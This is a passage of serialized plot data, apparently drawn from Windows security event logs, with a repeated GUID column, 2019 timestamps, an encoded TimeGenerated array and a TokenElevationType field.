5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\"],\"TimeCreatedUtc\":[\"2019-01-15 05:24:24.010\",\"2019-01-15 05:24:24.023\",\"2019-01-15 05:24:25.807\",\"2019-01-15 05:24:26.010\",\"2019-01-15 05:07:26.003\",\"2019-01-15 05:08:24.013\",\"2019-01-15 05:08:24.030\",\"2019-01-15 05:08:25.717\",\"2019-01-15 05:08:26.007\",\"2019-01-15 05:09:26.010\",\"2019-01-15 05:10:24.000\",\"2019-01-15 05:10:24.047\",\"2019-01-15 05:10:25.653\",\"2019-01-15 05:10:26.000\",\"2019-01-15 05:20:24.000\",\"2019-01-15 05:20:24.017\",\"2019-01-15 05:20:25.337\",\"2019-01-15 05:20:26.017\",\"2019-01-15 05:21:26.003\",\"2019-01-15 05:17:26.000\",\"2019-01-15 05:18:24.010\",\"2019-01-15 05:18:24.027\",\"2019-01-15 05:18:25.407\",\"2019-01-15 05:18:26.010\",\"2019-01-15 05:19:26.000\",\"2019-01-15 04:47:26.000\",\"2019-01-15 04:48:24.013\",\"2019-01-15 04:48:24.030\",\"2019-01-15 04:48:25.743\",\"2019-01-15 04:48:26.017\",\"2019-01-15 04:39:26.000\",\"2019-01-15 04:40:24.013\",\"2019-01-15 04:40:24.027\",\"2019-01-15 04:40:25.393\",\"2019-01-15 04:40:26.000\",\"2019-01-15 04:37:26.007\",\"2019-01-15 04:38:24.000\",\"2019-01-15 04:38:24.020\",\"2019-01-15 04:38:25.453\",\"2019-01-15 04:38:26.017\",\"2019-01-15 04:17:26.000\",\"2019-01-15 04:18:24.003\",\"2019-01-15 04:18:24.020\",\"2019-01-15 04:18:25.490\",\"2019-01-15 04:18:26.010\",\"2019-01-15 05:13:26.007\",\"2019-01-15 05:15:16.167\",\"2019-01-15 05:15:16.277\",\"2019-01-15 05:15:16.340\",\"2019-01-15 05:15:16.353\",\"2019-01-15 05:15:16.400\",\"2019-01-15 05:15:16.430\",\"2019-01-15 05:15:16.447\",\"2019-01-15 05:15:16.500\",\"2019-01-15 05:15:16.510\",\"2019-01-15 05:15:16.520\",\"2019-01-15 05:15:16.563\",\"2019-01-15 05:15:16.613\",\"2019-01-15 05:15:16.663\",\"2019-01-15 05:15:16.677\",\"2019-01-15 05:15:16.720\",\"2019-01-15 05:15:16.767\",\"2019-01-15 05:15:16.807\",\"2019-01-15 05:15:16.850\",\"2019-01-15 05:15:16.893\",\"2019-01-15 05:15:16.967\",\"2019-01-15 05:15:17.020\",\"2019-01-15 05:15:17.077\",\"2019-01-15 05:15:17.127\",\"2019-01-15 05:15:17.137\",\"2019-01-15 05:14:24.003\",\"2019-01-15 05:14:24.023\",\"2019-01-15 05:14:25.517\",\"2019-01-15 05:14:26.013\",\"2019-01-15 05:15:03.017\",\"2019-01-15 05:15:03.047\",\"2019-01-15 05:15:03.057\",\"2019-01-15 05:15:03.247\",\"2019-01-15 05:15:03.257\",\"2019-01-15 05:15:03.390\",\"2019-01-15 05:15:03.410\",\"2019-01-15 05:15:03.503\",\"2019-01-15 05:15:03.517\",\"2019-01-15 05:15:03.543\",\"2019-01-15 05:15:03.550\",\"2019-01-15 05:15:03.830\",\"2019-01-15 05:15:03.850\",\"2019-01-15 05:15:04.507\",\"2019-01-15 05:15:05.193\",\"2019-01-15 05:15:08.723\",\"2019-01-15 05:15:10.667\",\"2019-01-15 05:15:10.683\",\"2019-01-15 05:15:10.707\",\"2019-01-15 05:15:10.730\",\"2019-01-15 05:15:10.753\",\"2019-01-15 05:15:10.817\",\"2019-01-15 05:15:11.190\",\"2019-01-15 05:15:11.260\",\"2019-01-15 05:15:11.347\",\"2019-01-15 05:15:11.413\",\"2019-01-15 05:15:11.493\",\"2019-01-15 05:15:11.537\",\"2019-01-15 05:15:11.617\",\"2019-01-15 05:15:12.930\",\"2019-01-15 05:15:12.977\",\"2019-01-15 05:15:13.053\",\"2019-01-15 05:15:13.100\",\"2019-01-15 05:15:13.173\",\"2019-01-15 05:15:13.220\",\"2019-01-15 05:15:13.287\",\"2019-01-15 05:15:13.337\",\"2019-01-15 05:15:13.407\",\"2019-01-15 05:15:13.453\",\"2019-01-15 05:15:13.517\",\"2019-01-15 05:15:13.567\",\"2019-01-15 05:15:13.633\",\"2019-01-15 05:15:13.683\",\"2019-01-15 05:15:13.747\",\"2019-01-15 05:15:13.793\",\"2019-01-15 05:15:13.867\",\"2019-01-15 05:15:11.767\",\"2019-01-15 05:15:11.833\",\"2019-01-15 05:15:11.947\",\"2019-01-15 05:15:12.003\",\"2019-01-15 05:15:12.067\",\"2019-01-15 05:15:12.123\",\"2019-01-15 05:15:12.160\",\"2019-01-15 05:15:12.167\",\"2019-01-15 05:15:12.167\",\"2019-01-15 05:15:12.337\",\"2019-01-15 05:15:12.393\",\"2019-01-15 05:15:12.460\",\"2019-01-15 05:15:12.513\",\"2019-01-15 04:35:15.673\",\"2019-01-15 04:35:16.060\",\"2019-01-15 04:35:26.010\",\"2019-01-15 05:15:12.610\",\"2019-01-15 05:15:12.670\",\"2019-01-15 05:15:12.740\",\"2019-01-15 05:15:12.847\",\"2019-01-15 05:15:15.160\",\"2019-01-15 05:15:15.183\",\"2019-01-15 05:15:15.233\",\"2019-01-15 05:15:15.283\",\"2019-01-15 05:15:15.317\",\"2019-01-15 05:15:15.440\",\"2019-01-15 05:15:15.457\",\"2019-01-15 05:15:15.483\",\"2019-01-15 05:15:15.500\",\"2019-01-15 05:15:15.520\",\"2019-01-15 05:15:15.533\",\"2019-01-15 05:15:15.553\",\"2019-01-15 05:15:15.570\",\"2019-01-15 05:15:15.620\",\"2019-01-15 05:15:15.677\",\"2019-01-15 05:15:15.727\",\"2019-01-15 05:15:15.777\",\"2019-01-15 05:15:15.827\",\"2019-01-15 05:15:15.880\",\"2019-01-15 05:15:15.923\",\"2019-01-15 05:15:15.950\",\"2019-01-15 05:15:15.967\",\"2019-01-15 05:15:16.020\",\"2019-01-15 05:15:16.067\",\"2019-01-15 05:15:16.117\",\"2019-01-15 05:15:17.217\",\"2019-01-15 05:15:17.220\",\"2019-01-15 05:15:17.257\",\"2019-01-15 05:15:17.363\",\"2019-01-15 05:15:17.410\",\"2019-01-15 05:15:17.457\",\"2019-01-15 05:15:17.493\",\"2019-01-15 05:15:17.520\",\"2019-01-15 05:15:17.570\",\"2019-01-15 05:15:17.580\",\"2019-01-15 05:15:17.650\",\"2019-01-15 05:15:18.080\",\"2019-01-15 05:15:18.147\",\"2019-01-15 05:15:18.230\",\"2019-01-15 04:36:24.010\",\"2019-01-15 04:36:24.027\",\"2019-01-15 04:36:25.517\",\"2019-01-15 04:36:26.000\",\"2019-01-15 04:49:26.010\",\"2019-01-15 04:50:24.000\",\"2019-01-15 04:50:24.017\",\"2019-01-15 04:50:25.693\",\"2019-01-15 04:50:26.010\",\"2019-01-15 04:33:26.003\",\"2019-01-15 04:33:32.463\",\"2019-01-15 05:15:18.287\",\"2019-01-15 05:15:18.300\",\"2019-01-15 05:15:18.320\",\"2019-01-15 05:15:18.337\",\"2019-01-15 05:15:18.403\",\"2019-01-15 05:15:18.450\",\"2019-01-15 05:15:18.500\",\"2019-01-15 05:15:18.547\",\"2019-01-15 05:15:18.553\",\"2019-01-15 05:15:18.630\",\"2019-01-15 05:15:18.670\",\"2019-01-15 05:15:18.707\",\"2019-01-15 05:15:18.770\",\"2019-01-15 05:15:18.820\",\"2019-01-15 05:15:18.867\",\"2019-01-15 05:15:18.917\",\"2019-01-15 05:15:18.967\",\"2019-01-15 05:15:19.010\",\"2019-01-15 05:15:19.060\",\"2019-01-15 05:15:19.127\",\"2019-01-15 05:15:19.180\",\"2019-01-15 05:15:19.223\",\"2019-01-15 05:15:19.337\",\"2019-01-15 05:15:19.403\",\"2019-01-15 05:15:19.447\",\"2019-01-15 05:15:19.490\",\"2019-01-15 05:15:19.537\",\"2019-01-15 05:15:19.583\",\"2019-01-15 05:15:19.617\",\"2019-01-15 05:15:20.623\",\"2019-01-15 05:15:26.013\",\"2019-01-15 05:15:14.033\",\"2019-01-15 05:15:14.100\",\"2019-01-15 05:15:14.157\",\"2019-01-15 05:15:14.227\",\"2019-01-15 05:15:14.293\",\"2019-01-15 05:15:14.377\",\"2019-01-15 05:15:14.453\",\"2019-01-15 05:15:14.453\",\"2019-01-15 05:15:14.490\",\"2019-01-15 05:15:14.493\",\"2019-01-15 05:15:14.563\",\"2019-01-15 05:15:14.613\",\"2019-01-15 05:15:14.640\",\"2019-01-15 05:15:14.693\",\"2019-01-15 05:15:14.770\",\"2019-01-15 05:05:26.000\",\"2019-01-15 05:06:24.000\",\"2019-01-15 05:06:24.043\",\"2019-01-15 05:06:25.770\",\"2019-01-15 05:06:26.000\",\"2019-01-15 04:34:24.010\",\"2019-01-15 04:34:24.030\",\"2019-01-15 04:34:25.583\",\"2019-01-15 04:34:26.000\",\"2019-01-15 04:25:26.000\",\"2019-01-15 04:26:24.000\",\"2019-01-15 04:26:24.017\",\"2019-01-15 04:26:25.833\",\"2019-01-15 04:26:26.007\",\"2019-01-15 04:41:26.000\",\"2019-01-15 04:42:24.000\",\"2019-01-15 04:42:24.017\",\"2019-01-15 04:42:25.387\",\"2019-01-15 04:42:25.437\",\"2019-01-15 04:42:26.007\",\"2019-01-15 04:43:05.240\",\"2019-01-15 04:43:05.253\",\"2019-01-15 04:43:26.000\",\"2019-01-15 04:19:26.000\",\"2019-01-15 04:20:24.000\",\"2019-01-15 04:20:24.017\",\"2019-01-15 04:20:25.423\",\"2019-01-15 04:20:26.007\",\"2019-01-15 04:31:26.000\",\"2019-01-15 04:32:24.010\",\"2019-01-15 04:32:24.027\",\"2019-01-15 04:32:25.650\",\"2019-01-15 04:32:26.000\",\"2019-01-15 04:27:26.000\",\"2019-01-15 04:28:01.517\",\"2019-01-15 04:28:24.003\",\"2019-01-15 04:28:24.020\",\"2019-01-15 04:28:25.770\",\"2019-01-15 04:28:26.013\",\"2019-01-15 04:28:33.090\",\"2019-01-15 05:11:26.000\",\"2019-01-15 05:12:24.007\",\"2019-01-15 05:12:24.023\",\"2019-01-15 05:12:25.403\",\"2019-01-15 05:12:25.590\",\"2019-01-15 05:12:26.003\",\"2019-01-15 04:29:26.010\",\"2019-01-15 04:30:24.007\",\"2019-01-15 04:30:24.023\",\"2019-01-15 04:30:25.710\",\"2019-01-15 04:30:26.000\",\"2019-01-15 05:16:24.003\",\"2019-01-15 05:16:24.020\",\"2019-01-15 05:16:25.453\",\"2019-01-15 05:16:26.007\",\"2019-01-15 04:23:26.000\",\"2019-01-15 04:23:43.103\",\"2019-01-15 04:24:24.000\",\"2019-01-15 04:24:24.017\",\"2019-01-15 04:24:25.307\",\"2019-01-15 04:24:26.000\",\"2019-01-15 04:44:24.000\",\"2019-01-15 04:44:24.017\",\"2019-01-15 04:44:25.867\",\"2019-01-15 04:44:26.007\",\"2019-01-15 04:44:37.180\",\"2019-01-15 04:44:37.193\",\"2019-01-15 04:21:26.000\",\"2019-01-15 04:22:24.017\",\"2019-01-15 04:22:24.030\",\"2019-01-15 04:22:25.360\",\"2019-01-15 04:22:26.010\",\"2019-01-15 04:15:26.000\",\"2019-01-15 04:16:24.007\",\"2019-01-15 04:16:24.027\",\"2019-01-15 04:16:25.550\",\"2019-01-15 04:16:26.000\",\"2019-01-15 05:22:24.007\",\"2019-01-15 05:22:24.023\",\"2019-01-15 05:22:25.863\",\"2019-01-15 05:22:26.007\",\"2019-01-15 05:23:26.000\",\"2019-01-15 04:51:26.000\",\"2019-01-15 04:52:24.000\",\"2019-01-15 04:52:24.020\",\"2019-01-15 04:52:25.613\",\"2019-01-15 04:52:26.013\",\"2019-01-15 04:59:26.017\",\"2019-01-15 05:00:24.003\",\"2019-01-15 05:00:24.017\",\"2019-01-15 05:00:25.363\",\"2019-01-15 05:00:26.000\",\"2019-01-15 05:03:26.000\",\"2019-01-15 05:04:24.000\",\"2019-01-15 05:04:24.020\",\"2019-01-15 05:04:25.837\",\"2019-01-15 05:04:26.007\",\"2019-01-15 05:01:26.007\",\"2019-01-15 05:01:52.640\",\"2019-01-15 05:02:24.000\",\"2019-01-15 05:02:24.027\",\"2019-01-15 05:02:25.293\",\"2019-01-15 05:02:26.003\",\"2019-01-15 05:02:28.260\",\"2019-01-15 05:02:28.270\",\"2019-01-15 04:55:26.000\",\"2019-01-15 04:56:24.003\",\"2019-01-15 04:56:24.020\",\"2019-01-15 04:56:25.490\",\"2019-01-15 04:56:26.000\",\"2019-01-15 04:53:26.000\",\"2019-01-15 04:54:24.003\",\"2019-01-15 04:54:24.020\",\"2019-01-15 04:54:25.557\",\"2019-01-15 04:54:26.007\",\"2019-01-15 04:57:26.000\",\"2019-01-15 04:58:24.013\",\"2019-01-15 04:58:24.030\",\"2019-01-15 04:58:25.427\",\"2019-01-15 04:58:26.010\",\"2019-01-15 04:45:24.523\",\"2019-01-15 04:45:26.007\",\"2019-01-15 04:45:28.157\",\"2019-01-15 04:46:24.017\",\"2019-01-15 04:46:24.033\",\"2019-01-15 04:46:25.800\",\"2019-01-15 04:46:26.007\"],\"TimeGenerated\":{\"__ndarray__\":\"AKA0fP+EdkIAcDV8/4R2QgDwpHz/hHZCAKCxfP+EdkIAMKuD/oR2QgDQ1JH+hHZCAODVkf6EdkIAUD+S/oR2QgBwUZL+hHZCAKD3oP6EdkIAACCv/oR2QgDwIq/+hHZCAFCHr/6EdkIAAJ2v/oR2QgAAnEH/hHZCABCdQf+EdkIAkO9B/4R2QgAQGkL/hHZCADC/UP+EdkIAACcW/4R2QgCgUCT/hHZCALBRJP+EdkIA8Kck/4R2QgCgzST/hHZCAABzM/+EdkIAALNe/YR2QgDQ3Gz9hHZCAODdbP2EdkIA8Eht/YR2QgAQWm39hHZCAACD6fyEdkIA0Kz3/IR2QgCwrff8hHZCABAD+PyEdkIAACn4/IR2QgBwN8z8hHZCAABg2vyEdkIAQGHa/IR2QgDQutr8hHZCABDe2vyEdkIAAD+n+4R2QgAwaLX7hHZCAEBptfuEdkIAIMW1+4R2QgCg5bX7hHZCAHCP2/6EdkIAcHT2/oR2QgBQe/b+hHZCAEB/9v6EdkIAEID2/oR2QgAAg/b+hHZCAOCE9v6EdkIA8IX2/oR2QgBAifb+hHZCAOCJ9v6EdkIAgIr2/oR2QgAwjfb+hHZCAFCQ9v6EdkIAcJP2/oR2QgBQlPb+hHZCAACX9v6EdkIA8Jn2/oR2QgBwnPb+hHZCACCf9v6EdkIA0KH2/oR2QgBwpvb+hHZCAMCp9v6EdkIAUK32/oR2QgBwsPb+hHZCABCx9v6EdkIAMLjp/oR2QgBwuen+hHZCANAW6v6EdkIA0DXq/oR2QgCQPvP+hHZCAHBA8/6EdkIAEEHz/oR2QgDwTPP+hHZCAJBN8/6EdkIA4FXz/oR2QgAgV/P+hHZCAPBc8/6EdkIA0F3z/oR2QgBwX/P+hHZCAOBf8/6EdkIAYHHz/oR2QgCgcvP+hHZCALCb8/6EdkIAkMbz/oR2QgAwo/T+hHZCALAc9f6EdkIAsB31/oR2QgAwH/X+hHZCAKAg9f6EdkIAECL1/oR2QgAQJvX+hHZCAGA99f6EdkIAwEH1/oR2QgAwR/X+hHZCAFBL9f6EdkIAUFD1/oR2QgAQU/X+hHZCABBY9f6EdkIAIKr1/oR2QgAQrfX+hHZCANCx9f6EdkIAwLT1/oR2QgBQufX+hHZCAEC89f6EdkIAcMD1/oR2QgCQw/X+hHZCAPDH9f6EdkIA0Mr1/oR2QgDQzvX+hHZCAPDR9f6EdkIAENb1/oR2QgAw2fX+hHZCADDd9f6EdkIAEOD1/oR2QgCw5PX+hHZCAHBh9f6EdkIAkGX1/oR2QgCwbPX+hHZCADBw9f6EdkIAMHT1/oR2QgCwd/X+hHZCAAB69f6EdkIAcHr1/oR2QgBwevX+hHZCABCF9f6EdkIAkIj1/oR2QgDAjPX+hHZCABCQ9f6EdkIAkGWs/IR2QgDAfaz8hHZCAKDrrvyEdkIAIJb1/oR2QgDgmfX+hHZCAECe9f6EdkIA8KT1/oR2QgCANfb+hHZCAPA29v6EdkIAEDr2/oR2QgAwPfb+hHZCAFA/9v6EdkIAAEf2/oR2QgAQSPb+hHZCALBJ9v6EdkIAwEr2/oR2QgAATPb+hHZCANBM9v6EdkIAEE72/oR2QgAgT/b+hHZCAEBS9v6EdkIA0FX2/oR2QgDwWPb+hHZCABBc9v6EdkIAMF/2/oR2QgCAYvb+hHZCADBl9v6EdkIA4Gb2/oR2QgDwZ/b+hHZCAEBr9v6EdkIAMG72/oR2QgBQcfb+hHZCABC29v6EdkIAQLb2/oR2QgCQuPb+hHZCADC/9v6EdkIAIML2/oR2QgAQxfb+hHZCAFDH9v6EdkIAAMn2/oR2QgAgzPb+hHZCAMDM9v6EdkIAINH2/oR2QgAA7Pb+hHZCADDw9v6EdkIAYPX2/oR2QgCgFL38hHZCALAVvfyEdkIA0HK9/IR2QgAAkb38hHZCAKD/e/2EdkIAACiK/YR2QgAQKYr9hHZCANCRiv2EdkIAoKWK/YR2QgAwn5H8hHZCAPAyk/yEdkIA8Pj2/oR2QgDA+fb+hHZCAAD79v6EdkIAEPz2/oR2QgAwAPf+hHZCACAD9/6EdkIAQAb3/oR2QgAwCff+hHZCAJAJ9/6EdkIAYA73/oR2QgDgEPf+hHZCADAT9/6EdkIAIBf3/oR2QgBAGvf+hHZCADAd9/6EdkIAUCD3/oR2QgBwI/f+hHZCACAm9/6EdkIAQCn3/oR2QgBwLff+hHZCAMAw9/6EdkIAcDP3/oR2QgCQOvf+hHZCALA+9/6EdkIAcEH3/oR2QgAgRPf+hHZCABBH9/6EdkIA8En3/oR2QgAQTPf+hHZCAPCK9/6EdkIA0Nv4/oR2QgAQ7/X+hHZCAEDz9f6EdkIA0Pb1/oR2QgAw+/X+hHZCAFD/9f6EdkIAkAT2/oR2QgBQCfb+hHZCAFAJ9v6EdkIAoAv2/oR2QgDQC/b+hHZCADAQ9v6EdkIAUBP2/oR2QgAAFfb+hHZCAFAY9v6EdkIAIB32/oR2QgAAX2b+hHZCAACIdP6EdkIAsIp0/oR2QgCg9nT+hHZCAAAFdf6EdkIAoMif/IR2QgDgyZ/8hHZCAPAqoPyEdkIAAEWg/IR2QgAAbxz8hHZCAACYKvyEdkIAEJkq/IR2QgCQCiv8hHZCAHAVK/yEdkIAAM8G/YR2QgAA+BT9hHZCABD5FP2EdkIAsE4V/YR2QgDQURX9hHZCAHB1Ff2EdkIAgAkf/YR2QgBQCh/9hHZCAAAbJP2EdkIAAIvE+4R2QgAAtNL7hHZCABC10vuEdkIA8AzT+4R2QgBwMdP7hHZCAABTdPyEdkIAoHyC/IR2QgCwfYL8hHZCACDjgvyEdkIAAPmC/IR2QgAAuzn8hHZCANBmQvyEdkIAMORH/IR2QgBA5Uf8hHZCAKBSSPyEdkIA0GFI/IR2QgAgHEr8hHZCAABDvv6EdkIAcGzM/oR2QgBwbcz+hHZCALDDzP6EdkIAYM/M/oR2QgAw6cz+hHZCAKAHV/yEdkIAcDBl/IR2QgBwMWX8hHZCAOCaZfyEdkIAAK1l/IR2QgAwBAf/hHZCAEAFB/+EdkIA0F4H/4R2QgBwgQf/hHZCAAAj//uEdkIA8E8D/IR2QgAATA38hHZCABBNDfyEdkIAsJ0N/IR2QgAAyQ38hHZCAABEMv2EdkIAEEUy/YR2QgCwuDL9hHZCAHDBMv2EdkIAwHs1/YR2QgCQfDX9hHZCAADX4fuEdkIAEAHw+4R2QgDgAfD7hHZCAABV8PuEdkIAoH3w+4R2QgAA84n7hHZCAHAcmPuEdkIAsB2Y+4R2QgDgfJj7hHZCAACZmPuEdkIAcOhe/4R2QgBw6V7/hHZCAHBcX/+EdkIAcGVf/4R2QgAAC27/hHZCAABLmf2EdkIAAHSn/YR2QgBAdaf9hHZCANDYp/2EdkIA0PGn/YR2QgAQfA7+hHZCADCkHP6EdkIAEKUc/oR2QgAw+Rz+hHZCAAAhHf6EdkIAABNJ/oR2QgAAPFf+hHZCAEA9V/6EdkIA0K5X/oR2QgBwuVf+hHZCAHDHK/6EdkIAAEgy/oR2QgAA8Dn+hHZCALDxOf6EdkIA0EA6/oR2QgAwbTr+hHZCAED6Ov6EdkIA4Po6/oR2QgAA49P9hHZCADAM4v2EdkIAQA3i/YR2QgAgaeL9hHZCAACJ4v2EdkIAAJe2/YR2QgAwwMT9hHZCAEDBxP2EdkIAUCHF/YR2QgBwPcX9hHZCAAAv8f2EdkIA0Fj//YR2QgDgWf/9hHZCADCx//2EdkIAoNX//YR2QgCwCkH9hHZCAHBnQf2EdkIA0O1B/YR2QgAQkU/9hHZCABCST/2EdkIAgABQ/YR2QgBwDVD9hHZC\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[363]},\"TokenElevationType\":[\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\